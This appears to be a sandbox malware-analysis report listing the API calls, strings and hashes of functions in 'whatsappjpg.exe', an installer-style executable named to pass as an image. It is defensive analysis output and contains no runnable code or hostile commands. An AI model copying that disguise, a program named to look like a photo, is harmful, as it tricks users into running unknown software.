API String ID: 1265525490-3322868524
Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 1000248D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 100024E1
StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5

Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,76F8FFC0,100011AA,?,00000000), ref: 1000131E

GlobalFree.KERNEL32(?), ref: 10002562
GlobalFree.KERNEL32(00000000), ref: 1000258B

Strings

s<u, xrefs: 100024E1

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: FreeGlobal$FromStringlstrcpywsprintf
String ID: s<u
API String ID: 2435812281-779365171
Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\whatsappjpg.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00406206

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182
"C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 004061C0
*?|<>/":, xrefs: 004061CE

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2883303802
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 004024EC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566

Strings

C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp, xrefs: 00402526
C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A
8, xrefs: 0040250A

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll
API String ID: 1453599865-328255866
Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(00008000,00000064,00007B28), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 100022EB Relevance: 9.1, APIs: 6, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 10002391
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
CLSIDFromString.OLE32(?,00000000), ref: 100023BF
GlobalAlloc.KERNEL32(00000040), ref: 100023DD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
GlobalFree.KERNEL32(00000000), ref: 1000241A

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
String ID:
API String ID: 3579998418-0
Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61

Function 100018C1 Relevance: 7.7, APIs: 5, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalFree.KERNEL32(?), ref: 10001928
GlobalFree.KERNEL32(?), ref: 10001AB9
GlobalFree.KERNEL32(?), ref: 10001ABE

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: FreeGlobal$lstrcpy
String ID:
API String ID: 176019282-0
Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
